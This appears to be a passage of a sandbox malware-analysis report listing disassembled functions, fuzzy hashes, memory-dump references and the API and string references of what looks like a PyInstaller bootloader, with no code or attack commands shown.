Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d2b2a23e656420a48cffdcfc29ff0550bdd13d7615b538a3eaf25f4462ec28d4
Instruction ID: 4df124fe89de79992bc048d7f840a4933b05a55dcbc010a57943210b8fd6000a
Opcode Fuzzy Hash: d2b2a23e656420a48cffdcfc29ff0550bdd13d7615b538a3eaf25f4462ec28d4
Instruction Fuzzy Hash: 6A61C422E0C28286FB648E28849067D6683AF50771F5C4639D65DC7BDEDE7DE800AF02

Function 00007FF6399C0C64 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: b7e95cb8629de25b5a47b9a21f11b615d2fc4501ba26038cd1550028ccc76943
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 72518176E1865186EB248F29C44033937A2EB54B68F294131CE4D977DACF3AE843DF40

Function 00007FF6399C1484 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: 8fc5c39fbdf268be2be3c7ce4aaba248350051b08e93e6b6d7e72a9432e0f103
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 78516276E1865186E7348F29C44423A33A2EB49B58F2C4131DA4D977EACF3AE843DF44

Function 00007FF6399C1074 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 6024fc745160ad81242dd162c43b452f453d205c5ebb7e070329cf5d1ebce17a
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: EF515376E1865186E7348F29C44423A37A2EB45B68F284131CE4D977DACF7AE843DF44

Function 00007FF6399C0A60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: 847f84a3c5ee28f6ce6734fc923c2273e05c13f3562adc9fb130abd55ab4512e
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: C6516E76E1865586EB248F29C44423937A2EB48B58F2E4131CE4D977DADF3AE843DF40

Function 00007FF6399C1280 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 296b30af30bcf5c053d0d8c0f6638d2124dd40ced90d100902ce302da074a7f9
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: 0C517136E1865186E7348F29C84023A27A2EB49B5CF284131CE4D977DECF3AE852DF44

Function 00007FF6399C0E70 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 8f3c3e4e04445c9f80ca4c9bcb1666354382323ee1b6a988d750c1d00ea96373
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: 2A517036E1865586EB348F29C44023D27A2EB54B58F2D4131CE4D977DACF3AE892DF44

Function 00007FF6399C5040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: d32db26ed9fdb5f1926a93cb36da260ce2b1ffb04b7e52570186cc67cab64882
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: E341B452D4D74A05F9558D180D186B42682AF63BA0D6C52B0DDADD33CBCD0DB9C6AF42

Function 00007FF6399C91B0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction ID: cff387004381fe4843e98c8d060c1f0b87243a992996df4b5ed95b495450b2f7
Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction Fuzzy Hash: 58410562B18A5486EF08CF6AD95416973A6BB48FD0B0DA032DE0DD7B9DDE3CC8419B00

Function 00007FF6399C73F4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction ID: d9cd19069d050446c512217c83d717a9c2bb35042bfafd3113fda6e0ec3b0e41
Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction Fuzzy Hash: 8B318772F18B8241E7149F256C8117E6AD6AB88BD0F184238EA5D97BDADF3CD4115F04

Function 00007FF6399D8880 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction ID: 503771f4d9009fe78ae1e18da0802de45acab4af884a2882f9a0acbd72a2b40c
Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction Fuzzy Hash: EEF06271B182958EEBA49F2DA84263977D1F708385F848039F68EC3F59DA7D90609F14

Function 00007FF6399BC62C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction ID: adb81d2988691bc508207cdf257a00c8112868c2e4eea3a4274c1a3f8f113304
Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction Fuzzy Hash: 44A00122918827E0E6488F48A8905252232FB61310B481039D10D813EAAF2CA400AA10

Function 00007FF6399B50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B50C0
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5101
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5126
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B514B
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5173
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B519B
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B51C3
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B51EB
GetProcAddress.KERNEL32(?,00007FF6399B5C57,?,00007FF6399B308E), ref: 00007FF6399B5213

Strings

PyImport_ExecCodeModule, xrefs: 00007FF6399B5411, 00007FF6399B542D
PyUnicode_FromString, xrefs: 00007FF6399B5731, 00007FF6399B574D
PyConfig_InitIsolatedConfig, xrefs: 00007FF6399B5209, 00007FF6399B5225
PyStatus_Exception, xrefs: 00007FF6399B5619, 00007FF6399B5635
PyErr_Clear, xrefs: 00007FF6399B52D1, 00007FF6399B52ED
PyUnicode_AsUTF8, xrefs: 00007FF6399B5691, 00007FF6399B56AD
Py_DecodeLocale, xrefs: 00007FF6399B50F7, 00007FF6399B5113
PyObject_Str, xrefs: 00007FF6399B55A1, 00007FF6399B55BD
PyErr_Restore, xrefs: 00007FF6399B5399, 00007FF6399B53B5
PyErr_NormalizeException, xrefs: 00007FF6399B5321, 00007FF6399B533D
PyModule_GetDict, xrefs: 00007FF6399B54D9, 00007FF6399B54F5
PyList_Append, xrefs: 00007FF6399B5461, 00007FF6399B547D
PyRun_SimpleStringFlags, xrefs: 00007FF6399B55F1, 00007FF6399B560D
PyConfig_SetBytesString, xrefs: 00007FF6399B5259, 00007FF6399B5275
PyConfig_Clear, xrefs: 00007FF6399B51E1, 00007FF6399B51FD
Py_IsInitialized, xrefs: 00007FF6399B5191, 00007FF6399B51AD
PySys_SetObject, xrefs: 00007FF6399B5669, 00007FF6399B5685
PyObject_CallFunctionObjArgs, xrefs: 00007FF6399B5529, 00007FF6399B5545
PyMarshal_ReadObjectFromString, xrefs: 00007FF6399B5489, 00007FF6399B54A5
PyErr_Print, xrefs: 00007FF6399B5371, 00007FF6399B538D
PyConfig_SetWideStringList, xrefs: 00007FF6399B52A9, 00007FF6399B52C5
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF6399B55C9, 00007FF6399B55E5
PyUnicode_Replace, xrefs: 00007FF6399B5781, 00007FF6399B579D
Failed to get address for %hs, xrefs: 00007FF6399B50D9
PySys_GetObject, xrefs: 00007FF6399B5641, 00007FF6399B565D
Py_Finalize, xrefs: 00007FF6399B5141, 00007FF6399B515D
PyUnicode_Decode, xrefs: 00007FF6399B56B9, 00007FF6399B56D5
PyUnicode_Join, xrefs: 00007FF6399B5759, 00007FF6399B5775
PyObject_SetAttrString, xrefs: 00007FF6399B5579, 00007FF6399B5595
PyErr_Fetch, xrefs: 00007FF6399B52F9, 00007FF6399B5315
GetProcAddress, xrefs: 00007FF6399B50E0
PyMem_RawFree, xrefs: 00007FF6399B54B1, 00007FF6399B54CD
Py_InitializeFromConfig, xrefs: 00007FF6399B5169, 00007FF6399B5185
Py_ExitStatusException, xrefs: 00007FF6399B511C, 00007FF6399B5138
PyObject_CallFunction, xrefs: 00007FF6399B5501, 00007FF6399B551D
PyErr_Occurred, xrefs: 00007FF6399B5349, 00007FF6399B5365
PyUnicode_DecodeFSDefault, xrefs: 00007FF6399B56E1, 00007FF6399B56FD
PyConfig_Read, xrefs: 00007FF6399B5231, 00007FF6399B524D
PyConfig_SetString, xrefs: 00007FF6399B5281, 00007FF6399B529D
PyUnicode_FromFormat, xrefs: 00007FF6399B5709, 00007FF6399B5725
Py_PreInitialize, xrefs: 00007FF6399B51B9, 00007FF6399B51D5
Py_DecRef, xrefs: 00007FF6399B50B6, 00007FF6399B50D2
PyEval_EvalCode, xrefs: 00007FF6399B53C1, 00007FF6399B53DD
PyImport_AddModule, xrefs: 00007FF6399B53E9, 00007FF6399B5405
PyImport_ImportModule, xrefs: 00007FF6399B5439, 00007FF6399B5455
PyObject_GetAttrString, xrefs: 00007FF6399B5551, 00007FF6399B556D

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: 70dda718620aef1974c9210a040525128a2a1460ab85d1c0c6b7953fb0bc9cb7
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: B112C06490EB8391FA159F05A8901B423B3EF19795B9C1435C80E927EEFF3CB548BE81

Function 00007FF6399B77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399B86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6399B3FA4,00000000,00007FF6399B1925), ref: 00007FF6399B86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6399B7C97,?,?,FFFFFFFF,00007FF6399B3834), ref: 00007FF6399B782C

Part of subcall function 00007FF6399B26C0: MessageBoxW.USER32 ref: 00007FF6399B2736

Strings

CreateDirectory, xrefs: 00007FF6399B7974
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF6399B789D
%.*s, xrefs: 00007FF6399B790C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6399B78D9
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6399B7840
\, xrefs: 00007FF6399B7861
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6399B7803
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF6399B796D

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
Instruction ID: 171f60cf0536e381e9dd6c6e71f96f09d87888ea8165b2a04250ab5cc8896131
Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
Instruction Fuzzy Hash: AB415011A2C64381FA50AF29DC916BA6273EF94784F4C5436D64EC6BDFEE2CE504AF40

Function 00007FF6399B20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6399B211B
SelectObject.GDI32 ref: 00007FF6399B2162
DrawTextW.USER32 ref: 00007FF6399B2185
SelectObject.GDI32 ref: 00007FF6399B219B
ReleaseDC.USER32 ref: 00007FF6399B21AB
MoveWindow.USER32 ref: 00007FF6399B21FB
MoveWindow.USER32 ref: 00007FF6399B223B
MoveWindow.USER32 ref: 00007FF6399B228E
MoveWindow.USER32 ref: 00007FF6399B22D6

Strings

P%, xrefs: 00007FF6399B216F

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000000.00000002.3015493191.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015561575.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015589086.00007FF6399F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3015636186.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6399b0000_file.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: fa8e9d4263bfe59c2a42506e995e169acd11e49ed0ba84de262ca2074e937121
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: F35109266087A186D6349F26E4581BAB7A2FB98B61F044135EFDE83789DF3CD085DB10

Function 00007FF6399C55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6399C5C6C

Strings

f, xrefs: 00007FF6399C5705
p, xrefs: 00007FF6399C5695
p, xrefs: 00007FF6399C570D
-, xrefs: 00007FF6399C5679
:, xrefs: 00007FF6399C579C

Memory Dump Source

Source File: 00000000.00000002.3015519025.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

